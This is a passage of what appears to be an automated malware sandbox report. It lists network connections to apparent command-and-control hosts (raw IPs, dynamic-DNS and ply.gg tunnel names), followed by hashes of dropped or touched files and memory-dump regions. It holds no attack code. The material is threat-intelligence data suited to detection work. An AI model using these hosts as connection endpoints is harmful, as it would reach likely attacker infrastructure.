| DE | 3.70.228.168:555 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| GB | 132.145.17.167:9090 | 132.145.17.167 | tcp |
| IT | 185.225.73.67:1050 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| NL | 89.110.69.103:80 | 89.110.69.103 | tcp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 66.45.226.53:7777 | tcp | |
| US | 98.51.190.130:20 | tcp | |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 73.62.14.5:4782 | tcp | |
| VN | 14.243.221.170:3322 | tcp | |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| HK | 117.18.7.76:3782 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| US | 98.51.190.130:20 | tcp | |
| N/A | 192.168.56.1:4782 | tcp |
Files
C:\Users\Admin\Desktop\Microsoft Edge.lnk
| MD5 | cc7b4e1bf018d155945b3dec2fc29d49 |
| SHA1 | ea64874eec1e6972b824983e26c21d5b100912a2 |
| SHA256 | 5407351ffefddd734369f1a360370ada4196f1a3686cfecd80bb184d4db81288 |
| SHA512 | a772fb14afbf0a8249c04295e53035eb7fdae0bc869e529d5ae1452887c2d64bd7f9dacef003f12858a6899ff823442074b00b7ac0dc53dff4f04d3385e4d64f |
C:\Users\Public\Desktop\Microsoft Edge.lnk
| MD5 | 602ca407fdc0646f96a0dfb0fb3eb76d |
| SHA1 | eef6dab204532c90f405cd28a92e7b8026a1a210 |
| SHA256 | 6086b0b6cd41f2bd7276549520b87ad95244a3a4cb9d4b45fef916249c9f5d6e |
| SHA512 | 2c878d61824523176482090f5189f4122c9c9877d30a443492cddc261343e9b388d7a29c79a280903598f01e20963a639d4356d5ebc0ed906e0a15d0e162d603 |
C:\Users\Public\Desktop\Acrobat Reader DC.lnk
| MD5 | 215ec25271ca51b5323a7c3dd9aae784 |
| SHA1 | af4d9e5c2ddec9f17d48ae1be4400fe946a5f3e3 |
| SHA256 | 08b3abb45e9a9a8ad92770067bf6c482ae3452477f0e73558e28872c12d1a05e |
| SHA512 | 94caf4773ac560ed8826fb47e8fba07eaecbf9c6528cecb8c1f18f208467abcb78039ce89880939c7f1d5374b0b5c03fa25642398f81e130be764467f8af3954 |
C:\Users\Public\Desktop\VLC media player.lnk
| MD5 | aa9ee5aadeea559d493b35b4f9fd073e |
| SHA1 | 69fb8e5d4db05db1ec30b13ea1ffefeb2d42ad37 |
| SHA256 | 94ebb81085fffdc8c1def1f1f88cf016a95c5a43c08e45cd304c162a277b0d8a |
| SHA512 | b2b50d1b4881075d6237c5cb2bb0a70c2a5496aae96d9e7766472894339f2093ac4f593b0ad8f30272193af819d76c32a3fa03ebc6dd664a88c2277f97d88310 |
C:\Users\Public\Desktop\Firefox.lnk
| MD5 | b1981659850590b997822df37d917bfb |
| SHA1 | a5b65a89bd9145f00aacb1f52b3273e212f0b381 |
| SHA256 | ac49cc9d70283c74058cdc0fc68077b18ee3cd4cf9702e3d746e68b41b47a1e1 |
| SHA512 | b5abb283ee6fe345b673ee0a78ebddd54bf9208dfad44b04d0aeb58209e7ceae00d3ea948380a688b1939148c173b839f1e3edadcc910008694662c0b9a093ef |
C:\Users\Admin\Desktop\RemoveReset.aifc
| MD5 | be3109dda8da7dc902ba5df388a6e3c2 |
| SHA1 | cade4c778609504e8cb836d866ed06570d2a71ec |
| SHA256 | 1a9e6a53cd824a9c7752197f321b86493be08df6cd2e8a8e47593060271d581b |
| SHA512 | 8a977734ed686b44e9da5945231db215bc0a25dca4f7c60b99b7e33ac070a2c42874af44f94b4daa776e8e398a86789f7aa52f4bb3524c0d16fc747edeeb0e0f |
C:\Users\Admin\Desktop\BlockSubmit.ps1xml
| MD5 | a1a9242fadd7b3825b2068d3123f02ea |
| SHA1 | c85108e4ded1c1b5037f8b70a8fb8f8f4dd0b090 |
| SHA256 | 75589ab527b84637ab99e8232964286ec058b3876c53c2be0ede0af75aead076 |
| SHA512 | aad804f0a9153c5f39784a7148bc4157eea43809ab2bf3476c5b230c78b3f1d1b763083b07b8ac8c0f4d8a56fd3f96d22d53cc5dca4bc1a05c254f2659a056d6 |
C:\Users\Admin\Desktop\CheckpointUndo.vssx
| MD5 | f2b102ae2b95dc2c0f597109b84526ca |
| SHA1 | 2af599b839ae1ee03259ee0ac3df164e53a58eec |
| SHA256 | b072be6b5ccf7cf1269047df7093fa6755a64091fb2dfac6f0dc471b98b13298 |
| SHA512 | efbb57d687828726c82dd68b3b78e0261ee689f429ccd87bfe54d1e6c3eb3dc1d8f99244559e376c07cb4bbb8b304b75acdec105644a8790eb0958ec76d0129e |
C:\Users\Admin\Desktop\ClearStop.odt
| MD5 | 3b133708c28f214046ca120674c2b869 |
| SHA1 | 1131563efed560b11895d9053ab902db092adb0f |
| SHA256 | 0bde7f29bbc0d06a3a84116f3dc0546c3747c52fd5fd7b70442199f5a2047214 |
| SHA512 | cbd52e2db0a7b1eeb587003cbcb7c0ba454ffa1157c7836c4a60d7d723200b5e04a8f4450d2ef468524e238a24242a32e711786e775537ab6d12e9bdc2a7ef3e |
C:\Users\Admin\Desktop\ConnectSwitch.xlsb
| MD5 | c16829dc4a6ee46731f9c69ad285cd55 |
| SHA1 | 62e699ed2aa305d79c689516362145202b2ff703 |
| SHA256 | 2188cf1138d116b5686948ad0bcc256279b778c34f9080df0c522954cf470eb0 |
| SHA512 | 109d0055c258fdad90d74882eab09cc4c516736cf6af7b61354b955fcab96a126872797c19d8d91f4679010ec1fc701b0dbc8d1af9a2e0359d882a54fcb3ad4c |
C:\Users\Admin\Desktop\CopySwitch.wmf
| MD5 | 1ec753deaebfb5cd7096296fe5e9fc10 |
| SHA1 | 86ca2ad50017598dd5198b351b1116f03d4daed8 |
| SHA256 | 63d341bca97011679d1f49ee681867046021d8ec7497153097212f5efe34b3c9 |
| SHA512 | bb12688698cd5ac0e6cdcc5d07fc4e5bad6b9513a312d789c4ae6b253ec6dc6f61e77518445de0de8f92ef7975b78eaed307832fffdfb90971266ee827adb4a0 |
C:\Users\Admin\Desktop\DebugInitialize.eps
| MD5 | 6b3eca8688b491c0537af9dee804adeb |
| SHA1 | 0b6e45d3e81de0e8210ab60ad9eee1f6053f7e41 |
| SHA256 | 20009089e7765ad56af8a058e676f044ed5a53b1c2ea15192cd71294fa0874db |
| SHA512 | a2dfc22baf4261a91c76541cd219ab50084b935cf5368be19419f07512c16949ae97e68ee73aaceb6693ea67181a2e0614730530dd2412aac511c967b2018e46 |
C:\Users\Admin\Desktop\DisconnectRevoke.ps1
| MD5 | e984225860e85407167c9d39334dee61 |
| SHA1 | 2e5f9711eaba1f3e6fca25d8b21d16e102fa8979 |
| SHA256 | fa1f827bbd2cc1445815242014a5409605c3f2e742de1e4f3b87626049860782 |
| SHA512 | cf3e706d7903df585f6d8ae18c813eddfd5b435a5e1759ae622769b5ff9d0b50db56e74487b987bc097eb8b48e8c2125e710846446cc0572b3c95159ca492fde |
C:\Users\Admin\Desktop\RepairResize.snd
| MD5 | c296bbd6cc5a56c6170fbc71b69d52c5 |
| SHA1 | 11109b9ecae83771d5d183da8a40d07938458ac8 |
| SHA256 | 2f55d55daeee7f0c980ca28c18f0e878f30375947be5c642e065978a33d6573e |
| SHA512 | f97d8c306e8af919f7b179867bcf55a8f6efcce13c35b5a8c8e6c07bec97dbbd3ec684ed563ca7fb1f04ef9e39f2f42000734749c4100b3d85d5e68a1ad9dc6a |
C:\Users\Admin\Desktop\RepairUnregister.emz
| MD5 | 2022a3229437e4b3b4d4efe1f391ef0d |
| SHA1 | 99c01096460cb7e23e7a14462068fcb33b9c08e5 |
| SHA256 | 605d84e459fc529abd7721b28926af51471206376e3b37f0407f0b554bb77100 |
| SHA512 | 999f545ddb505289eec6d266462b202346ac8bd0d95e716bce082e1039c2e4add0544c9634d531d1330536be7c4c2913267a6adf1d7dde42a6cc5b92c99c2318 |
C:\Users\Admin\Desktop\ReadPop.eprtx
| MD5 | 66b47d0c367b4d5dbe7d9ec9f6812fa1 |
| SHA1 | 7aac07e7c16ab2754c290a9c85fbc798aee5d0c5 |
| SHA256 | fe06f3efa923edd4beed4f79ffcfcfe1aa44a39cf3b66b440ec71f375108d0d7 |
| SHA512 | 12983e0b9f5b0a5f7e5852e2618dbede8b085e07c3ca126d455671bb2a3553367c19d5b1d2966725c62c8b34e98ab44eeffc7b602b66f45d36e4276504dea09c |
C:\Users\Admin\Desktop\PushSync.mp3
| MD5 | d292d6be812bddbcba72ee162df65f2a |
| SHA1 | 2299cea94acee53c97bc727797bb35ff592008ed |
| SHA256 | a1da4657389c531259f4987cbf95a2458470c183f05401cc793b9c256d9e2808 |
| SHA512 | c23f59b98599976499e1151905f877152167e700e0bf7f8e6f699e9f5f92429ae567f62cdec7b904ec0a0925b82e9972d738563d523c51ccad3daf3636b4c6bb |
C:\Users\Admin\Desktop\JoinUse.raw
| MD5 | b027902f361298ddde499a32725ecc40 |
| SHA1 | f207ff1b6f67941a1f70e4465d4bfa5299808a0f |
| SHA256 | 34252ccad4de71651032a9946839698b179158c9ce0ecf75ce9fae12238e667b |
| SHA512 | 72a9f5501f815bfd34ad64208600f75425393403e88a5c10c489a74da1acc2ab44e9d20469bab3e094630f374b392193db1246ec3472f164fc0dc6fc6674b04f |
C:\Users\Admin\Desktop\FindPublish.css
| MD5 | 1e420e194b9484e5933d3ceb010a0732 |
| SHA1 | 63048ba5c383730ccd1b55df1e4da0b4a035ab9a |
| SHA256 | 0c2525b85be2b07f084284f967fcc80888aac2952824379cca2811557107b5a3 |
| SHA512 | 7096d5117f58e593aeddeaa453ba1c25377160248d86473d1462776585c9e45ff833f790e42be3392b55ac3528d55a496dd6e4e5f75b75dc566c593812c06318 |
C:\Users\Admin\Desktop\FindConvertFrom.vdw
| MD5 | dd6b7fad0f836503bedfc382bd160f9b |
| SHA1 | 305fa24835b39e14a5dc7c7dee8f778723264718 |
| SHA256 | ea63d7a2673f030efbd70edd3cc5b1f235a0eb966a8db323af6123e9879510bf |
| SHA512 | a27c850178c8a3dce2ee34b2317c307334c4311b7e3d382f766fec1531548d68b53d712e8ba7043da503b77b8e8a6576cf4974b6c9a44e75087b84bbb4e589f3 |
C:\Users\Admin\Desktop\ResumeGroup.jfif
| MD5 | b9dba631a82f55358b4106c4c55384ff |
| SHA1 | b51c9233b4cf9c13ddbdc257466c9beef96d7e68 |
| SHA256 | 4230f7a2f98630dfb3c1ab8426f9b7053d1946a770e54fb2681c5317a379e113 |
| SHA512 | 3e154a7e90ccd39af849d408dbd8a4ba0cc0a385ae9c859cc179b2af4e343d3a91210708e7dbf127e7125e856425a35fa4543eff2a1f6e51053ca9b6f7576d52 |
C:\Users\Admin\Desktop\SplitEdit.emf
| MD5 | 173d3e1a63052e2161488950a9a56224 |
| SHA1 | 43d99a14996943642479593205773d2d892ee615 |
| SHA256 | 234bafe4ed32c447805fac34557d2fad13427af56c4e670a3df29ebeb34c5d06 |
| SHA512 | 8c93dec47b7381b86c5ed3d06edbf87defddca129dff8cf2918e337828e8de6c7e8e924bf5281c387d25629b98832b114ea644d5fd5d3e953932a82680cbb108 |
C:\Users\Admin\Desktop\SwitchInitialize.edrwx
| MD5 | fe730f4d49ecb33c089f96fd113dadee |
| SHA1 | b728245ba7e2571b7aaee583b814698cc4c92707 |
| SHA256 | 5dce590d1f17f40644834d5f2539c0b09ef16c99e13cc4f73599ba4864a3e2a9 |
| SHA512 | 51a90dcd289a75907d16302c9072cb3a461bae13cdefc4db43c372f1fa5c1db867f2750c46f4d2b2b387bbba934dd1f881a69c80031d569202e1ef516b0d511d |
C:\Users\Admin\Desktop\UnpublishExport.wmv
| MD5 | 507270c2b5cfa05c7d93a7ccbcda2e4c |
| SHA1 | dc705d0b060d7aefc33de660e2c4755121a11115 |
| SHA256 | 61494914130789575685f4919a8298a3c067378f9cc26455c4d0973947c53de3 |
| SHA512 | fcd5dcb7465ee08f1a417f438c3c4853f21972bc0ddd298465f314c477d573035798882f285e0df76989172a7ccb6e58e86918fb9d50bbb6399c18e01f9d06d5 |
C:\Users\Admin\Desktop\UnregisterGrant.mpp
| MD5 | 3620829aeab82ab7ac443e1f62fc2cb1 |
| SHA1 | 78a5269f7612ffaa8da22ca965337f379051dc82 |
| SHA256 | 7a641541c0fe9940961cc74e86a3e4ef814648583fb80ceb5b13898cac1959dc |
| SHA512 | a8c6c2084db70cad537d4d0c9248b114b11c49992be7225f1be89f091a337b5b5177ed62981c511aa7ede4bde29a14a0b6c71f5310cd466cf825db4b12daf11c |
C:\Users\Admin\Desktop\GrantExpand.docx
| MD5 | 02aec5ac60880571afff32de4e3cadf8 |
| SHA1 | ed0803194467ae357d0a6e969b876d2b1084ca74 |
| SHA256 | b6472115606393b296d8d68ed7a92c9fa31a1462c9bc5c04e6b9bc4e32d863ca |
| SHA512 | 3cee5c88ce9ae22d31aa6d224440fbbe7ce20efb1d91c11816e05345410df643e99ca88d7fda22803fe8409e0683da484cd71cd8f5ea987c8308281f5a7fa9a8 |
C:\Users\Admin\Desktop\BlockPing.xlsx
| MD5 | fcfcbe5e81b7412806b162d68baff908 |
| SHA1 | 14eb14f94a0b3a795233cdd934fd14bbc1326d26 |
| SHA256 | d4fece678ea5e72e675d56c32ac83b20a2d283e682258c0b6fdca639836a253d |
| SHA512 | d95f47bd53fb960290f4e39893f945a5edfb34ab57582eb119be2fb4bc777ea2742151878b3c9cd25bf32b82a0891203f639105d2a2749405d0a85904b5ec7c6 |
C:\Users\Admin\Desktop\ResumeOut.xlsx
| MD5 | 6c8b85389047613b4219985098d60077 |
| SHA1 | 5f69ce5cd8942e997390f5711e59299a4406f84b |
| SHA256 | 74610b1373b1ce22522f0e97a3d5007ae3a8753db8583cbcfa96508f786dfb6a |
| SHA512 | 30586c26f17f82ea241079b3cba6a88d6fb80071d0b2fef0ee75beaaa97639182eb596dc8aa01ea7c0e447f2a8b9aeedb7b28216861a5536818495875bb5872e |
C:\Users\Admin\Desktop\ExportJoin.xlsx
| MD5 | 1cb8b20e9415700ee6deec6d4230acaf |
| SHA1 | 6845042d57a8f99c7330f09eb3e728f0ddfb544f |
| SHA256 | 35af76f4194ed7db335fe66d7fa46c63850aa6d5489241cc1179e629e5b26700 |
| SHA512 | 030ef417192f104254f90284ab0fc02ea18d4e4a2fbfeb7cc4bbc89c0106e20ad254166c5698b27fdc7f1c7ae4511d47a9aba21eb359980af63d16b685eccebe |
C:\Users\Admin\Desktop\StartRepair.inf
| MD5 | 0f49b97efcd631553e82ddced93cbb3e |
| SHA1 | f4445110377a5b7748400f9a648d8065c8e07000 |
| SHA256 | 7d234d184ba7739fead28dbe54d60884e570e897a11e9807f25ea6be31ba2446 |
| SHA512 | a9c7db4c359c53eed7a8393e71060d299b6e77fc4ff8b3821bd567ecb1ab17abdb53dc05805a3c7ee4273e98ca9bc13f287486be161d8c2712d6a9e0cc5d2e5d |
C:\Users\Public\Desktop\Google Chrome.lnk
| MD5 | a94de23dcefb96299d68ee22bb7253e3 |
| SHA1 | 40cad3fdbaf4c6ea13f2282bb41174bacbd8584c |
| SHA256 | 112d51315329d5e2f771ced0d3944247c6032004279b2a67df7743d9602a7afd |
| SHA512 | 1d3de7c4e4eb1c6d9911ad6fa968744ff2d53604073089cd59b0ee1bdeccf14650582ef700eae90da89d38eea2b7e8e4e2960c2955866f9cb40493fb0a850a07 |
C:\Users\Admin\Desktop\ConvertUnblock.xltx
| MD5 | 0f3f143a05221f99f87582089267c0ae |
| SHA1 | 95dc04033097bc9c2839a13734702dec4db97b1b |
| SHA256 | ae9fc000778a79a0eed090e8aae2ed9856f983323390f8ed909f824e8bfcc6bd |
| SHA512 | 09bd970e6a5bea31a79c4641e5914e525dbf25bbcafa1b49565da885aa34534c3c43b628a1bf446a34fd6f6ab3d4c1e4b846558dc3060788e434e6cd96d23d16 |
C:\Users\Admin\Desktop\RestoreSend.xltm
| MD5 | eaaa855d828dbf659cbdf2df6a40fedb |
| SHA1 | 614ae8a359d93f3045e468190eb60ff7936b87e7 |
| SHA256 | 30712ed409e71620e0f6d867e427dd371da1e2b02a9cfefbb8544c3cde0775b2 |
| SHA512 | c3935105ec09ba2f16ff65c05ec013e80f08ccf3848c9febf84e8bb1474b2666414856bf567db81e2cbd46f95aeb0c9120225c33302740026958ac9ae7639c70 |
C:\Users\Admin\Desktop\InvokeRegister.lnk
| MD5 | 57bd40ecdb8dfca447ec375cf2012741 |
| SHA1 | 8aa874988ef801c08692e6900d9f71961b5d8f7e |
| SHA256 | 2fee3ddf30f3de17499064392572a3ff8277f38f03f9c4890160f4a7ebe4a48e |
| SHA512 | 01f6f0afaa8b2ac5ec3405526ebc0c4cbe00102d9108eecbdebbd78c559eea09a44ae7341ff1e2b9e80ebe96f2cbae818add0690c2d50a62d52af09d2a2674eb |
C:\Users\Admin\Desktop\UnregisterInitialize.jpe
| MD5 | c7444d6a80890242ca2727e061208fce |
| SHA1 | d12b810758638cd3d28fff5e48a1eef0fceb2ec4 |
| SHA256 | a65b1020dcb4ae97f624594f0694f703cf2c34692b20233ad5c6ed977a27d75b |
| SHA512 | 854e22261f1c63371efb602e6d287cd222664cf95e69fedb72004af996fb5fcb4b852a5bb051da45f14e502c4552e01755ec6dd53540fa7a40f556d87e9ef648 |
memory/4684-35-0x00000264DF530000-0x00000264DF531000-memory.dmp
memory/4684-37-0x00000264DF530000-0x00000264DF531000-memory.dmp
memory/4684-36-0x00000264DF530000-0x00000264DF531000-memory.dmp
memory/4684-41-0x00000264DF530000-0x00000264DF531000-memory.dmp
memory/4684-43-0x00000264DF530000-0x00000264DF531000-memory.dmp
memory/4684-44-0x00000264DF530000-0x00000264DF531000-memory.dmp
memory/4684-42-0x00000264DF530000-0x00000264DF531000-memory.dmp
memory/4684-45-0x00000264DF530000-0x00000264DF531000-memory.dmp
memory/4684-46-0x00000264DF530000-0x00000264DF531000-memory.dmp
memory/4684-47-0x00000264DF530000-0x00000264DF531000-memory.dmp
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | 89887588e6e8ee5d20c951243250c0d6 |
| SHA1 | c17d71bf1b197da2c3a2d653469068f320d90fed |
| SHA256 | b2bd6c90f5dbda8dd857571d61a3e23f2f7677cc0ac73f97cef38994bf8a67d1 |
| SHA512 | 20f79224788893970ed043873aa4759f560c8d515dd236ab668a8dba0dded0766cd7c0c035a824fd75257ec03d2da3c51663f40c1764b385b3b54cee56ff6daa |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\datareporting\glean\pending_pings\8004a856-ff98-4641-87d5-c9b2271ef45a
| MD5 | e11d22c9cb33cdc8324eafbf0d323f2f |
| SHA1 | cbca38d898a1a61cf744c5e6b4a842c16ac79137 |
| SHA256 | 1dca1f431255ecc82bf6301f117b84106454120a1dfdd30251d71c371941629d |
| SHA512 | 305e0fa13da9f7fbfcdb98539db1209bb02443dbc59a180438da69b49600a23ddf1663bb9d0b8fb1db69f62b57e4cdcf470e5a14cf9a64bc192bc5cbba2cb3d5 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 9b76ab4ffb9e9f9cd98d1b7e8c64157f |
| SHA1 | e8281ebf39f6f28b56c9c631ff0151004f531f40 |
| SHA256 | 35e418cc7aa609ebcdd5092985bb2ad17e749cafafcf31642efc8f6333985bdb |
| SHA512 | dfda7e1f44cd0e95ecb94789960073952c03b7d65f2c1fc6bfcb5a8482647ea93459a5ea58813a9c53244f8c823a04ddd29c58de2858004b6b4b7225f75acfb2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\datareporting\glean\pending_pings\6f058607-ff01-4bef-8f1e-6a74cf509ca0
| MD5 | 841c7ab37c25a90e55cba59ae1d0a6c6 |
| SHA1 | 8666e10e5e56e8a9adad8929412fd65d3f38a8d5 |
| SHA256 | dc694f98f5512f3c19ca73420bdefe14965c1add879f4e611b5a6929bc613132 |
| SHA512 | 7f7faf222acee476c7bbc5b39d2c5006be99df65033c94817cdb0b1e3f6c4ee4a95f9b637e88be972cee5a727f8804959b13e6f78e10174dc72b5cad3d46894c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\datareporting\glean\pending_pings\37a9ec45-387c-4c94-aa25-948d90afc8c7
| MD5 | acbe98800cecd85970d18bec3cc8d60a |
| SHA1 | 09a09647648b19d2176ef6a9ca78c4eba29d4f32 |
| SHA256 | 7191db9b1bd31e6c4389cb34ecf852e64d01017636e2c0f14c348650e43bcd24 |
| SHA512 | 2cd538d3ee4398b4d318f5aaf51f15cfbb9309c4c373f3969b90ca5e61d9e217582535a886f180b0a57ce08860e7be2199cb001cacdd989a627c61ca405c2870 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | dd99da3b3b8e71a8eacb305e1faa80e5 |
| SHA1 | e9697c1bdc2e98503aacca9565191d872c2a7742 |
| SHA256 | 24b78247ca2e74a3e25f1a28dcf3a0f1fb9bb236646ff28b5efbb137b14e5c75 |
| SHA512 | 595f85db4a50940b7cf80c503520db485926ae5fd34dfcb6b2eeb510cf87e5114aab5600fbb7a1e1a146bd2fb95cb49b82126419f02f4796fc8dafdd5bc70f9a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\prefs-1.js
| MD5 | 9c4e9e1f4a57a61fc02617346674f360 |
| SHA1 | 9fcaa81a02d733685ac364e7c57417fa34419f99 |
| SHA256 | e23478ea6504e173a0b82a4667cafb575bad8ba9acdd007a11defb99799555d6 |
| SHA512 | 2619e7210f5a45a03f446742d74bd3a6dfc57b824e4d38de807ec7a3b17151e21a1561d9c3dbac368defc9d0774d75b0cc8d572012e3649d09c1f786871b6518 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\prefs-1.js
| MD5 | caa8f806316d1bbba70de46bf49805a2 |
| SHA1 | c2fe6a3a4facabce336db3dc5b2a90a253f5e5fe |
| SHA256 | 3309a94e78a197ab7cc982ca5a53eb797d05af21e5e635fc448ad1392edad949 |
| SHA512 | 526007fbede154a0b48ea72fae37efe6cc41434f5d0b1eb319a478d8c308ed9e3a55fb7c37d98ac0c734e2b6dae8ef252c3b31ed71b895d57b6b9b3b126ad491 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 120b7f16405ff21fc43a5aade290a11d |
| SHA1 | 1d80cc3e747ca5b7532e185e092b22784301c3c8 |
| SHA256 | 7d0905bea6b223308f7e4b3a6cfbdd6439a0e3ade57b43ea7a86eb8cfa8346b6 |
| SHA512 | 621f3484b65fbc86cdfae4cfa7be8a329c85f4943a415249c57dfa54d333386af61b2c418a2efd603a15ec0c27446ea8a3ce73938c3b506ca62f014b618a8ccd |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | f8000103af7059898fe8b780d67afaa4 |
| SHA1 | 97cf04e53ae9da345257061b892ad99e67b6380f |
| SHA256 | 85eeb0876982d14f7338683fb0888245678c2f6086787520ef627cf73a03a73d |
| SHA512 | e6f2b648ef72932bd7baedf027a028acc5c4b2f97c409f39c779ac329979aebf7ea9acf4d3e90af6283cd690e9fc1096ccbdb545ea90c11d7db24341605024c6 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\prefs-1.js
| MD5 | 70e7c1e377003ad95c873da50fe25d0a |
| SHA1 | 402e9406cebcf0d97cc914b77bd687bfd28fd3de |
| SHA256 | 20a07b6ca352d46a9022c4881d725152330a92c2c2e01d9073ceb1cdfad1252e |
| SHA512 | 28466613128fb8836aa53d91788ab825187cb733fa3ae815ac6ac0cc3c85611a0125d330c7579b1bf7b8bc0ed7017c1cf59e7ab034fbac5b49b16f110c04c32f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\AlternateServices.bin
| MD5 | 19cb849bb669e87d5902ccfac922a271 |
| SHA1 | 2a4d2c34fb50708f8978a5515072d4bceda8a15e |
| SHA256 | 17f33520288fb5d922a8bae943580ba51be4744936f87f7fa7eb80f299fc2eb7 |
| SHA512 | 94d2cf4b03448e1650546b825a405aca76430c295abf6d42eae5a5f81d3585e46e3041e45ab73d031dd95bd8ad6ce0e71f75dc874dedd151ce3d22072b05b0b6 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 893f39cddf5f11a1a8be7b4fba89a773 |
| SHA1 | 5729be345d1ad1062b522b282b7febf53383db26 |
| SHA256 | 95738b5901b7b107161fd4d99b7827230072bfeb3d2fe9dd2281cc41b881d1db |
| SHA512 | d81bd904e218572ee79e217c1497be537f7adfc0fdba364872e4952ce2cc3cd2dbeefc082f36dac4c85e29839c3bdf29618be0cdc5b6e8e4ac024eaf543527ed |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\prefs-1.js
| MD5 | e6f1f74a5ad54b91c8fa35da2f8686ac |
| SHA1 | 3887c0c8e6ec02b70ac3d2342cbc89cb3ed3bc17 |
| SHA256 | be88bcb4de3e66ac4e9096de56d862ad3ff20ba63c1afee16ba0f2ae5cab56ed |
| SHA512 | b26f1f945cb01ff007f4a2ed54a31a4d6ee405351841d65bad3ec55d8e34b6a51f3e25f3a2e6ddfe04bf94452f22553c404432031ea5d40e7fd98d86219b8883 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\sessionstore-backups\recovery.baklz4
| MD5 | c4779d535e85f167f63721ae4f3c18b1 |
| SHA1 | cc2b2b0da9339c0f50da89c1f5218385d424a1b3 |
| SHA256 | fb3acea8bdf9d30f27e95344bf4fc485c370f113574562147324cc2d9bf693f2 |
| SHA512 | cb223be7acf00149f7f173265e3f07b0655b06ba365978caf41c14d192d22f87d6ca5157ddc75eac40bd4effd0d35437147ad2ef6196e33354686960cc297a9e |
